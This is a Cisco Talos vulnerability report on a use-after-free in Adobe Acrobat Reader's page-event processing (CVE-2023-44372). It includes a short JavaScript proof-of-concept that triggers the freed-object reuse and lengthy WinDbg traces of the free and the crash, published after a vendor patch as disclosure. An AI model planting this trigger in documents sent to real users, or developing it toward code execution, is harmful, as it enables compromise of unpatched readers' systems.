Talos Vulnerability Report

TALOS-2023-1842

Adobe Acrobat Reader U3D page event use-after-free vulnerability

November 15, 2023
CVE Number

CVE-2023-44372

SUMMARY

A use-after-free vulnerability exists in the page event processing in Adobe Acrobat Reader 2023.006.20320. A specially crafted Javascript code inside a malicious PDF document can trigger reuse of a previously freed object, which can lead to memory corruption and could result in arbitrary code execution. An attacker needs to trick the user into opening the malicious file to trigger this vulnerability.

CONFIRMED VULNERABLE VERSIONS

The versions below were either tested or verified to be vulnerable by Talos or confirmed to be vulnerable by the vendor.

Adobe Acrobat Reader 2023.006.20320

PRODUCT URLS

Acrobat Reader - https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html

CVSSv3 SCORE

8.8 - CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CWE

CWE-416 - Use After Free

DETAILS

Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs.

Adobe’s PDF JavaScript environment always has an event object associated with the current execution. There are different types of event objects available inside different event handlers, such as a field event object or page open event object. There exists a use-after-free vulnerability in the way Adobe Acrobat handles the lifetime of these objects, specifically with the pages containing U3D objects. The following excerpt from the PoC demonstrates this vulnerability:

function main() { 

    this.pageNum = 4;
    app.activeDocs[0].addField("poc", "text", 4, [16,15,10,5] ) ; 
    getField("poc").setAction("Format",'set_page();'); } 

}


function set_page() { 

this.pageNum = 0;

}

In the above excerpt, the addField method adds a text field poc. Next, a callback function set_page is assigned to the Format action of the poc text field. When set_page is called it sets the page, which triggers a page event. This frees an object related to the poc text field. The use-after-free vulnerability occurs when the freed object is used without any validation. We can observe the following in the debugger (with PageHeap enabled):

0:000> g
Breakpoint 4 hit
eax=00000001 ebx=4dcd4e78 ecx=f147eeb8 edx=00000000 esi=4dcd4e48 edi=00000000
eip=70f8f57f esp=0506ed0c ebp=0506ed34 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x5470ff:
70f8f57f 8955fc          mov     dword ptr [ebp-4],edx ss:002b:0506ed30=ffffffff 
0:000> dd esi                                                                                ;<---------------- [1]
4dcd4e48  71b3cf18 00000000 00000000 ffffffff
4dcd4e58  00000000 00000000 00000000 000003d5
4dcd4e68  00000132 000004ba 00000001 00010001
4dcd4e78  00000001 00000000 00000000 00000004
4dcd4e88  f147eeb8 59fc4ff8 00000143 00000000
4dcd4e98  719da464 5f744fe8 00000000 00000000
4dcd4ea8  00000000 00000000 00000000 00000000
4dcd4eb8  00000000 00000000 00000000 00000000
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x5470ff:
70f8f57f 8955fc          mov     dword ptr [ebp-4],edx
70f8f582 e8f3c5e6ff      call    AcroRd32!AIDE::PixelPartInfo::operator=+0x3b36fa (70dfbb7a)  ;<---------------- [2]
70f8f587 8b4e40          mov     ecx,dword ptr [esi+40h]
70f8f58a 8bf8            mov     edi,eax
70f8f58c 56              push    esi
70f8f58d 689002f970      push    offset AcroRd32!AIDE::PixelPartInfo::operator=+0x547e10 (70f90290)
70f8f592 6a02            push    2
70f8f594 897e34          mov     dword ptr [esi+34h],edi

0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=000000e2 ebx=bac78000 ecx=bac8e55d edx=00000005 esi=0506e068 edi=bada9070
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h                                                     ;<---------------- [3]
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=000000e4 ebx=bac78000 ecx=bac8e562 edx=00000005 esi=0506e068 edi=bada9078
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=0000003e ebx=bac78000 ecx=bc87d869 edx=00000001 esi=0506e068 edi=00000000
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac pe cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000217
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=00000036 ebx=bac78000 ecx=bc87d86a edx=00000001 esi=0506e068 edi=00000000
eip=ba423d5b esp=0506e068 ebp=0506e224 iopl=0         nv up ei pl nz ac po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000213
EScript!mozilla::HashBytes+0x28ceb:
ba423d5b 3de4000000      cmp     eax,0E4h
0:000> g
(9d8.220): Break instruction exception - code 80000003 (first chance)
eax=0506def4 ebx=0506e034 ecx=baf3a4c0 edx=ffffff85 esi=bac78000 edi=bac78000
eip=ba54af6c esp=0506de7c ebp=0506ded4 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
EScript!PlugInMain+0xbafc:
ba54af6c 837dc881        cmp     dword ptr [ebp-38h],0FFFFFF81h ss:002b:0506de9c=ffffff85
0:000> pc
eax=0506e034 ebx=0506e034 ecx=baf3a4c0 edx=ffffff85 esi=bac78000 edi=bac78000
eip=ba54af84 esp=0506de78 ebp=0506ded4 iopl=0         nv up ei ng nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000292
EScript!PlugInMain+0xbb14:
ba54af84 e8210aeeff      call    EScript!mozilla::HashBytes+0x3093a (ba42b9aa)
0:000> pc
eax=d863efb8 ebx=00000000 ecx=58e59038 edx=ffffff85 esi=bac78000 edi=d863efb8
eip=ba54afaa esp=0506de70 ebp=0506ded4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
EScript!PlugInMain+0xbb3a:
ba54afaa e8f067eeff      call    EScript!mozilla::HashBytes+0x3672f (ba43179f)
0:000> p
eax=baf3a4c0 ebx=00000000 ecx=00000000 edx=ffffff85 esi=bac78000 edi=d863efb8
eip=ba54afaf esp=0506de70 ebp=0506ded4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
EScript!PlugInMain+0xbb3f:
ba54afaf 50              push    eax
0:000> dd eax
baf3a4c0  00000078 baf3a4c8 00610070 00650067
baf3a4d0  0075004e 0000006d 00000000 00000000
baf3a4e0  00000048 baf3a4e8 006f007a 006d006f
baf3a4f0  00000000 00000000 00000000 00000000
0:000> du baf3a4c8                                                                            ;<---------------- [4]
baf3a4c8  "pageNum"


0:000> g
eax=00000001 ebx=f0260f60 ecx=388dd4af edx=089f10d0 esi=4dcd4e48 edi=4dcd4e48
eip=70f4061e esp=0506dc30 ebp=0506dc44 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f819e:             
70f4061e 56              push    esi                                                          ;<---------------- [5]
0:000> dd 4dcd4e48                                                                            ;<---------------- [6]
4dcd4e48  7186a5e0 00000000 00000000 ffffffff
4dcd4e58  00000000 00000000 00000000 000003d5
4dcd4e68  00000132 000004ba 00000001 00000001
4dcd4e78  00000001 00000000 00000000 00000004
4dcd4e88  f147eeb8 59fc4ff8 00000143 00000000
4dcd4e98  7186a5e0 5f744fe8 00000000 00000000
4dcd4ea8  00000000 00000000 00000000 00000000
4dcd4eb8  00000000 00000000 00000000 00000000
0:000> p
eax=00000001 ebx=f0260f60 ecx=388dd4af edx=089f10d0 esi=4dcd4e48 edi=4dcd4e48
eip=70f4061f esp=0506dc2c ebp=0506dc44 iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000206
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f819f:
70f4061f e89c6b1fff      call    AcroRd32!AcroWinMainSandbox+0x81b0 (701371c0)                   ;<---------------- [7]
0:000> p
eax=00000001 ebx=f0260f60 ecx=4dcd4e48 edx=089f10e0 esi=4dcd4e48 edi=4dcd4e48
eip=70f40624 esp=0506dc2c ebp=0506dc44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81a4:
70f40624 eb0c            jmp     AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81b2 (70f40632)
0:000> dd 4dcd4e48                                                                               ;<---------------- [8]
4dcd4e48  ???????? ???????? ???????? ????????
4dcd4e58  ???????? ???????? ???????? ????????
4dcd4e68  ???????? ???????? ???????? ????????
4dcd4e78  ???????? ???????? ???????? ????????
4dcd4e88  ???????? ???????? ???????? ????????
4dcd4e98  ???????? ???????? ???????? ????????
4dcd4ea8  ???????? ???????? ???????? ????????
4dcd4eb8  ???????? ???????? ???????? ????????
0:000> p
eax=00000001 ebx=f0260f60 ecx=4dcd4e48 edx=089f10e0 esi=4dcd4e48 edi=4dcd4e48
eip=70f40632 esp=0506dc2c ebp=0506dc44 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroRd32!AIDE::PixelPartInfo::operator=+0x4f81b2:
70f40632 59              pop     ecx

At [1] above, the esi register contains the vulnerable buffer. The method called at [2] eventually calls the interpreter to execute the bytecodes of the set_page function at [3] and [4]. The execution of bytecodes triggers a page event, which eventually calls the free function at [7]. The argument of the free function comes from the esi register at [5]. The value of the vulnerable buffer is examined at [6], and [8] shows its value before and after the free function is called. The vulnerable freed buffer is later used without any validation. This can be observed in a debugger at the time of the crash:

0:000> g

Breakpoint 6 hit
eax=58c88f90 ebx=4dcd4e78 ecx=70dfbca4 edx=089f1078 esi=4dcd4e48 edi=00000000
eip=70dfbca4 esp=0506ed08 ebp=0506ed34 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x3b3824:
70dfbca4 c20400          ret     4

0:000> p
eax=58c88f90 ebx=4dcd4e78 ecx=70dfbca4 edx=089f1078 esi=4dcd4e48 edi=00000000
eip=70f8f587 esp=0506ed10 ebp=0506ed34 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
AcroRd32!AIDE::PixelPartInfo::operator=+0x547107:
70f8f587 8b4e40          mov     ecx,dword ptr [esi+40h] ds:002b:4dcd4e88=????????   ;<---------------- [9]
0:000> u
AcroRd32!AIDE::PixelPartInfo::operator=+0x547107:
70f8f587 8b4e40          mov     ecx,dword ptr [esi+40h]
70f8f58a 8bf8            mov     edi,eax
70f8f58c 56              push    esi
70f8f58d 689002f970      push    offset AcroRd32!AIDE::PixelPartInfo::operator=+0x547e10 (70f90290)
70f8f592 6a02            push    2
70f8f594 897e34          mov     dword ptr [esi+34h],edi
70f8f597 e8b6705aff      call    AcroRd32!CTJPEGMetaData::operator=+0x14a8a2 (70536652)
70f8f59c 8b4e40          mov     ecx,dword ptr [esi+40h]
0:000> kb
 # ChildEBP RetAddr      Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0506ed34 70f43b5c     388de517 dbaecab8 4dcd4e48 AcroRd32!AIDE::PixelPartInfo::operator=+0x547107
01 0506ed90 70f45094     00000001 70f3835d 388de6ab AcroRd32!AIDE::PixelPartInfo::operator=+0x4fb6dc
02 0506ee2c 70f3b254     00000001 00000000 00000001 AcroRd32!AIDE::PixelPartInfo::operator=+0x4fcc14
03 0506ee74 70f3fb7c     576ece40 00000001 00000000 AcroRd32!AIDE::PixelPartInfo::operator=+0x4f2dd4
04 0506eeb0 701b349b     576ece40 388de78f 24e10f50 AcroRd32!AIDE::PixelPartInfo::operator=+0x4f76fc
05 0506ef08 701b18b5     0005a45e 388de727 15fa8fd0 AcroRd32!DllCanUnloadNow+0x4c08b
06 0506efa0 701b15ba     0005a45e 701b12b7 388de77f AcroRd32!DllCanUnloadNow+0x4a4a5
07 0506eff8 70139ec4     000004d3 00000000 701399c0 AcroRd32!DllCanUnloadNow+0x4a1aa
08 0506f014 76b58e71     00050288 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xaeb4
09 0506f040 76b590d1     701399c0 00050288 00000113 USER32!_InternalCallWinProc+0x2b
0a 0506f0d4 76b5a66f     701399c0 00000000 00000113 USER32!UserCallWinProcCheckWow+0x18e
0b 0506f140 76b5a6e0     3919e0cf 0506f164 701b0b97 USER32!DispatchMessageWorker+0x208
0c 0506f14c 701b0b97     0506f180 17901da8 17901da8 USER32!DispatchMessageW+0x10
0d 0506f164 701b079e     0506f180 388df95f 17901da8 AcroRd32!DllCanUnloadNow+0x49787
0e 0506f1d8 701b04e0     388dfa97 17901da8 00000000 AcroRd32!DllCanUnloadNow+0x4938e
0f 0506f210 7012f783     388dfa03 1137cff8 00000000 AcroRd32!DllCanUnloadNow+0x490d0
10 0506f284 7012f19f     6ffa0000 00b30000 1137cff8 AcroRd32!AcroWinMainSandbox+0x773
11 0506f6a8 00d151a0     6ffa0000 00b30000 1137cff8 AcroRd32!AcroWinMainSandbox+0x18f
12 0506fa5c 00d616ba     00b30000 00000000 08a004e8 AcroRd32_exe!IsSandboxedProcess+0x125800
13 0506faa8 77107c04     fedbe000 77107be0 3dbd786d AcroRd32_exe!AcroRd32IsBrokerProcess+0x1d53a
14 0506fabc 7782b90f     fedbe000 3d2f5cfc 00000000 KERNEL32!BaseThreadInitThunk+0x24
15 0506fb04 7782b8da     ffffffff 778106e8 00000000 ntdll!__RtlUserThreadStart+0x2f
16 0506fb14 00000000     00d10e10 fedbe000 00000000 ntdll!_RtlUserThreadStart+0x1b

In the above debugger output, the crash occurs when esi is dereferenced, as if it were an object pointer. Depending on the memory layout of the process, it may be possible to abuse this vulnerability for arbitrary read and write access, which could ultimately be abused to achieve arbitrary code execution.

TIMELINE

2023-10-09 - Vendor Disclosure
2023-11-14 - Vendor Patch Release
2023-11-15 - Public Release

Credit

Discovered by Kamlapati Choubey of Cisco Talos.